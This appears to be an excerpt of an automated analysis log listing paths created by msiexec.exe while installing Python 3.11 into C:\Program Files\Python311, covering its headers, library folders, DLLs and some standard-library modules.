Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\dynamic_annotations.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\enumobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\errcode.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\exports.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\fileobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\fileutils.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\floatobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\frameobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\genericaliasobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\import.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_abstract.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_accu.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_asdl.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_ast.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_ast_state.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_atomic.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_atomic_funcs.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_bitutils.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_blocks_output_buffer.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_bytes_methods.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_bytesobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_call.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_ceval.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_code.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_compile.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_condvar.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_context.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_dict.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_dtoa.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_emscripten_signal.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_exceptions.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_fileutils.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_floatobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_format.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_frame.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_function.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_gc.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_genobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_getopt.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_gil.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_global_objects.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_global_strings.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_hamt.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_hashtable.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_import.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_initconfig.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_interp.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_interpreteridobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_list.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_long.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_moduleobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_namespace.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_object.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_opcode.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_parser.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pathconfig.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pyarena.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pyerrors.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pyhash.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pylifecycle.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pymath.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pymem.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pystate.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_runtime.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_runtime_init.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_signal.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_sliceobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_strhex.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_structseq.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_symtable.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_sysmodule.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_traceback.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_tuple.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_typeobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_ucnhash.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_unicodeobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_unionobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_warnings.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\intrcheck.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\iterobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\listobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\longobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\marshal.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\memoryobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\methodobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\modsupport.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\moduleobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\object.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\objimpl.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\opcode.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\osdefs.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\osmodule.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\patchlevel.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\py_curses.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pybuffer.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pycapsule.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pyconfig.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pydtrace.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pyerrors.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pyexpat.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pyframe.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pyhash.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pylifecycle.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pymacconfig.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pymacro.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pymath.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pymem.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pyport.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pystate.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pystrcmp.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pystrtod.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\Python.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pythonrun.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pythread.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pytypedefs.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\rangeobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\setobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\sliceobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\structmember.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\structseq.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\sysmodule.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\token.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\traceback.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\tracemalloc.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\tupleobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\typeslots.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\unicodeobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\warnings.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\weakrefobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\libs
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\libs\python311.lib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\libs\python3.lib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\data
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\data\fixers
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\data\fixers\myfixes
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\data\fixers\myfixes\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\tomllib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\tomllib\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dbm
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dbm\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\pgen2
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\pgen2\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\sqlite3
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\sqlite3\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\command
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\command\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xmlrpc
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xmlrpc\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\unittest
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\unittest\test
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\unittest\test\testmock
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\unittest\test\testmock\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\tests
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\tests\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\multiprocessing
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\multiprocessing\dummy
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\multiprocessing\dummy\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\etree
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\etree\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\venv
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\venv\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\multiprocessing\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\wsgiref
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\wsgiref\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\ham
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\ham\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ensurepip
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ensurepip\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\re
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\re\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\unittest\test\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\email
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\email\mime
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\email\mime\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\data\fixers\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\parsers
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\parsers\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\data\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\importlib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\importlib\metadata
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\importlib\metadata\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\email\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\encodings
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\encodings\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\html
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\html\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\futures
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\futures\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\http
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\http\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\unittest\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\fixes
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\fixes\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\sax
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\sax\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\zoneinfo
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\zoneinfo\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\pydoc_data
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\pydoc_data\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\dom
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\dom\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\importlib\resources
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\importlib\resources\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\msilib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\msilib\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\importlib\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\logging
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\logging\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\urllib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\urllib\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\collections
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\collections\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\json
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\json\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_asyncio.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_bz2.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_ctypes.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_decimal.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_elementtree.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_hashlib.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_lzma.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_msi.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_multiprocessing.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_overlapped.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_queue.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_socket.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_sqlite3.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_ssl.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_uuid.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_zoneinfo.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__future__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__hello__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\ham\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\ham\eggs.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\spam.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_aix_support.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_bootsubprocess.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_collections_abc.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_compat_pickle.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_compression.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_markupbase.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_osx_support.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_py_abc.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_pydecimal.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_pyio.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_sitebuiltins.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_strptime.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_threading_local.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_weakrefset.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\abc.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\aifc.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\antigravity.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\argparse.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ast.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asynchat.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\__main__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\base_events.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\base_futures.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\base_subprocess.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\base_tasks.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\constants.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\coroutines.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\events.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\exceptions.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\format_helpers.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\futures.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\locks.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\log.py
